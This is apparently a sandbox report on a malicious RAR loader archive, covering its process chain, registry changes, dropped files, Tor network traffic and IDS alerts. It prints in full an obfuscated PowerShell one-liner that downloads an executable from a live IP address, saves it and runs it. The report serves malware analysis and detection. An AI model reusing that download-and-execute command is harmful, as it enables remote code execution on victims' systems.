File name:

notice_0742.rar

Full analysis: https://app.any.run/tasks/f63497f2-9985-450c-8315-367821d10e93
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: June 19, 2019, 12:22:16
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

CAB66E0A8D80F1157406E7129ECCA5D5

SHA1:

60A5D6292439BEB5B2B6353FD9679D99F0203279

SHA256:

64F85BF6E24385B16C9945354A879A574A368CC1FEF574621695862BD56B29F5

SSDEEP:

192:dLwLFRcp6Bt21kba/upsr4R5QDaZPHEfZYW7s7dd8:dcL7c4Bt26eSsrIQmZsfygs7dd8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2864)
    • Application was dropped or rewritten from another process

      • 5659.exe (PID: 3428)
      • 5659.exe (PID: 2968)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3516)
    • Downloads executable files from IP

      • powershell.exe (PID: 3516)
    • Loads dropped or rewritten executable

      • 5659.exe (PID: 3428)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3516)
      • 5659.exe (PID: 3428)
    • Creates files in the user directory

      • powershell.exe (PID: 3516)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 3700)
    • Executes scripts

      • WinRAR.exe (PID: 2948)
    • Reads Internet Cache Settings

      • powershell.exe (PID: 3516)
    • Application launched itself

      • 5659.exe (PID: 3428)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
3
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start winrar.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe 5659.exe 5659.exe

Process information

PID
CMD
Path
Indicators
Parent process
2864"C:\Windows\System32\cmd.exe" /c powershell.exe $esPctm = 'guCm7czI';$x = new-object -comobject 'msxml2.xmlhttp';$vQH7TdhI = 'WiSjlExbi';$a = new-object -comobject 'adodb.stream';$bb4w56w = 'EfnbGJtb';$x.open('get', 'http://185.234.216.76/read.exe', 0);$T7XP2n = 'IgkPwM';$x.send();$yOYNwP = 'jyOrg';$a.open();$jEY9CVF = 'HiSAwI';$a.type = 1;$SpzYj3L = 'liyFvS';$a.write($x.responsebody);$yb2Chb = 'XgaEEy';$a.savetofile('..\5659.exe');$Blq07d = 'wbMqSPfm';$a.close();$sWTK0ecB = 'dSbI81';start-process '..\5659.exe';C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2948"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\notice_0742.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
Modules
Images
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
2968"C:\Users\admin\AppData\Local\5659.exe" C:\Users\admin\AppData\Local\5659.exe
5659.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\5659.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
3428"C:\Users\admin\AppData\Local\5659.exe" C:\Users\admin\AppData\Local\5659.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\5659.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
3516powershell.exe $esPctm = 'guCm7czI';$x = new-object -comobject 'msxml2.xmlhttp';$vQH7TdhI = 'WiSjlExbi';$a = new-object -comobject 'adodb.stream';$bb4w56w = 'EfnbGJtb';$x.open('get', 'http://185.234.216.76/read.exe', 0);$T7XP2n = 'IgkPwM';$x.send();$yOYNwP = 'jyOrg';$a.open();$jEY9CVF = 'HiSAwI';$a.type = 1;$SpzYj3L = 'liyFvS';$a.write($x.responsebody);$yb2Chb = 'XgaEEy';$a.savetofile('..\5659.exe');$Blq07d = 'wbMqSPfm';$a.close();$sWTK0ecB = 'dSbI81';start-process '..\5659.exe';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3700"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIb2948.45949\legal_doc_0742.js" C:\Windows\System32\WScript.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
Total events
1 355
Read events
1 263
Write events
92
Delete events
0

Modification events

(PID) Process:(2948) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2948) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\notice_0742.rar
(PID) Process:(2948) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(2948) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(2948) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(2948) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(2948) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
Operation:writeName:@C:\Windows\System32\wshext.dll,-4804
Value:
JScript Script File
(PID) Process:(2948) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface
Operation:writeName:ShowPassword
Value:
0
(PID) Process:(3700) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(3700) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
Executable files
3
Suspicious files
3
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
3516powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N42VK47F6QQQE4J3M7L2.temp
MD5:
SHA256:
2948WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIb2948.45949\legal_doc_0742.jstext
MD5:
SHA256:
3516powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:
SHA256:
3516powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\read[1].exeexecutable
MD5:
SHA256:
3516powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF154b3b.TMPbinary
MD5:
SHA256:
3516powershell.exeC:\Users\admin\AppData\Local\5659.exeexecutable
MD5:
SHA256:
34285659.exeC:\Users\admin\AppData\Local\Temp\214829588binary
MD5:
SHA256:
34285659.exeC:\Users\admin\AppData\Local\Temp\nsp6D0C.tmp\System.dllexecutable
MD5:FBE295E5A1ACFBD0A6271898F885FE6A
SHA256:A1390A78533C47E55CC364E97AF431117126D04A7FAED49390210EA3E89DD0E1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
19
DNS requests
2
Threats
53

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2968
5659.exe
GET
194.109.206.212:80
http://194.109.206.212/tor/status-vote/current/consensus
NL
malicious
2968
5659.exe
GET
172.104.85.43:80
http://172.104.85.43/tor/server/fp/874d84382c892f3f61cc9e106bf08843de0b865a
JP
suspicious
2968
5659.exe
GET
51.38.134.189:80
http://51.38.134.189/tor/server/fp/cc4a3ae960e3617f49bf9887b79186c14cba6813
GB
malicious
2968
5659.exe
GET
50.99.193.144:443
http://50.99.193.144:443/tor/server/fp/8a00ce9638bdb4686b91f1f0b229db3f8c9b8415
CA
suspicious
2968
5659.exe
GET
23.129.64.167:80
http://23.129.64.167/tor/server/fp/57f273716c5310eeec6b945e634faee2f5f7b04d
US
suspicious
2968
5659.exe
GET
209.141.41.41:80
http://209.141.41.41/tor/server/fp/53134d9637d9fbe565fa1e3af82b23cc964c56d6
US
suspicious
2968
5659.exe
GET
95.142.161.63:80
http://95.142.161.63/tor/server/fp/d1e12afda18a7b37f2cf9c05ad0cee254923e908
FR
suspicious
2968
5659.exe
GET
212.47.238.203:80
http://212.47.238.203/tor/server/fp/d1e12afda18a7b37f2cf9c05ad0cee254923e908
FR
suspicious
2968
5659.exe
GET
94.198.100.17:80
http://94.198.100.17/tor/server/fp/fd2f9b881ac640100c428df47dc9a863dc2f2536
IT
suspicious
2968
5659.exe
GET
195.123.218.100:80
http://195.123.218.100/tor/server/fp/2dfdea5dd415b95594bfb12d59fe841167f94b5f
NL
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3516
powershell.exe
185.234.216.76:80
malicious
2968
5659.exe
194.109.206.212:80
Xs4all Internet BV
NL
malicious
2968
5659.exe
23.23.243.154:443
api.ipify.org
Amazon.com, Inc.
US
malicious
2968
5659.exe
51.15.244.99:80
Online S.a.s.
FR
unknown
2968
5659.exe
50.99.193.144:443
TELUS Communications Inc.
CA
suspicious
2968
5659.exe
82.251.167.192:443
Free SAS
FR
suspicious
2968
5659.exe
129.6.15.28:13
time-a.nist.gov
National Bureau of Standards
US
unknown
2968
5659.exe
172.104.85.43:80
Linode, LLC
JP
suspicious
2968
5659.exe
51.38.134.189:80
GB
malicious
2968
5659.exe
51.255.26.155:443
OVH SAS
FR
suspicious

DNS requests

Domain
IP
Reputation
api.ipify.org
  • 23.23.243.154
  • 54.243.147.226
  • 107.22.215.20
  • 23.21.121.219
  • 54.204.36.156
  • 54.235.124.112
  • 50.16.229.140
  • 54.243.198.12
shared
time-a.nist.gov
  • 129.6.15.28
whitelisted

Threats

PID
Process
Class
Message
3516
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3516
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
3516
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3516
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2
3516
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
2968
5659.exe
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 279
2968
5659.exe
Misc activity
SUSPICIOUS [PTsecurity] ipify.org External IP Check
2968
5659.exe
Misc activity
SUSPICIOUS [PTsecurity] ipify.org External IP Check
2968
5659.exe
Misc activity
SUSPICIOUS [PTsecurity] ipify.org External IP Check
2968
5659.exe
Misc activity
SUSPICIOUS [PTsecurity] ipify.org External IP Check
1 ETPRO signatures available at the full report
No debug info